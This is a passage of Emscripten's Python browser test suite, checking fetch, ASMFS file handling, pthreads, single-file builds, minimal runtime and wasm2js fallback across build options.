def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
# Tests the feature that shell html page can preallocate the typed array and place it
# to Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(test_file('gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'] + arg,
also_asmjs=True)
@parameterized({
'': ([],),
'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@requires_threads
def test_fetch_from_thread(self, args):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/from_thread.cpp',
expected='42',
args=args + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(test_file('asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest_exit('asmfs/hello_file.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(test_file('asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest_exit('asmfs/read_file_twice.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest_exit('asmfs/fopen_write.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest_exit(test_file('unistd', 'close.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(test_file('unistd', 'access.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(test_file('unistd', 'unlink.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest_exit('asmfs/relative_paths.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest(test_file('pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest(test_file('pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule']]:
self.btest(test_file('pthread', 'hello_thread.c'), expected='1', args=['-s', 'MINIMAL_RUNTIME', '-s', 'USE_PTHREADS'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(test_file('pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(test_file('pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS'])
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(test_file('pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([test_file('pthread', 'hello_thread.c'), '-s', 'USE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'])
shutil.copyfile(test_file('pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE'])
create_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME', '-s', 'SINGLE_FILE', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE', '-s', 'ENVIRONMENT=web', '-O2', '--closure=1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.compile_btest([test_file('pthread', 'test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
create_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_file('test.txt', 'hello from file')
self.compile_btest([test_file('access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.compile_btest([test_file('access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_file('main.cpp', r'''
int main() {
REPORT_RESULT(0);
return 0;
}
''')
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(test_file('pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'EXPORTED_RUNTIME_METHODS=[print]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-s', 'MODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(test_file('emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(test_file('emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(test_file('emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(test_file('emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest(test_file('emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(test_file('emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(test_file('emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(test_file('emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-s', 'ASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(test_file('emscripten_console_log.c'), '0', args=['--pre-js', test_file('emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'WASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'MINIMAL_RUNTIME'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE']]:
for modularize in [[], ['-s', 'MODULARIZE']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure', '1']]:
self.btest(test_file('small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest_exit(test_file('browser', 'test_offset_converter.c'), assert_returncode=1, args=['-s', 'USE_OFFSET_CONVERTER', '-gsource-map', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
except Exception as e:
# dump the wasm file; this is meant to help debug #10539 on the bots
print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
raise e
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(test_file('browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME'])
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
html = open('test.html', 'r').read()
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(test_file('system.c'), '0')
# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
# This test verifies it is possible to override a symbol from WebGL library.
# When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
# the behavior afterwards.
self.btest(test_file('test_override_system_js_lib_symbol.c'),
expected='5121',
args=['--js-library', test_file('test_override_system_js_lib_symbol.js')])
# When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
self.btest(test_file('test_override_system_js_lib_symbol.c'),
expected='5121',
args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', test_file('test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('browser', 'test_4GB.cpp', js_engines=[config.V8_ENGINE])
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(test_file('mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed
args=['-s', 'MALLOC=emmalloc', '-s', 'ABORTING_MALLOC=0', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'MAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest(test_file('alloc_3gb.cpp'),
expected='0',
args=['-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ALLOW_MEMORY_GROWTH=1'] + args)
test(['-s', 'MALLOC=emmalloc'])
